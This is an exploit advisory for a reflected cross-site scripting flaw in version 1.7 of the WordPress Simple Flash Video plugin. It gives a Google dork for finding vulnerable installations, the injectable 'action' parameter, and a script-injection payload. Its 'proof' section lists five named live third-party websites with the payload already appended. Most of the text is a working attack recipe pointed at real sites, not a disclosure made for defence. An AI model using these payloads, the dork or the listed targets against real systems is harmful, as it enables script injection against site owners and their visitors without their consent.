WordPress Simple Flash Video plugin version 1.7 suffers from a cross site scripting vulnerability. Note that this advisory has site-specific information.
7714c16e062459979093cd9f760fbf44bac002ee973ebcf23c9d1ec6ba94ddbd
_ __ _____ _____
\ \ / / / ____| / ____|
\ V / | (___ | (___
> < \___ \ \___ \
/ . \ ____) | ____) |
/_/ \_\ |_____/ |_____/
#######################################################################
# Exploit Title : Wordpress Simple Flash Video Plugin Cross site scripting
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:/wp-content/plugins/simple-flash-video
#
# Vendor Homepage : www.wordpress.org
#
# Software Link :
http://downloads.wordpress.org/plugin/simple-flash-video.1.7.zip
#
# Version : 1.7
#
# Tested on: Windows , Linux
#
# Date: 2013/10/09
#
##############
# Exploit : Cross site scripting
#
# Location1:
[Target]/wp-content/plugins/simple-flash-video/stats/?action=[xss]
#
# Method : Get
#
# Script For Test : "/><script>alert(1);</script>
#
##############
##############
# Prof:
#
#
http://www.bigsportday.lv/wp-content/plugins/simple-flash-video/stats/?action=
"/><script>alert(1);</script>
#
#
http://www.leblogbergamote.com/wp-content/plugins/simple-flash-video/stats/?action=
"/><script>alert(1);</script>
#
#
http://www.thesoussegroup.com/wp-content/plugins/simple-flash-video/stats/?action=
"/><script>alert(1);</script>
#
#
http://www.switchdesign.com/wp-content/plugins/simple-flash-video/stats/?action=
"/><script>alert(1);</script>
#
#
http://www.whchronicle.com/wp-content/plugins/simple-flash-video/stats/?action=
"/><script>alert(1);</script>
##############
#
# Discovered By : ACC3SS
#
##############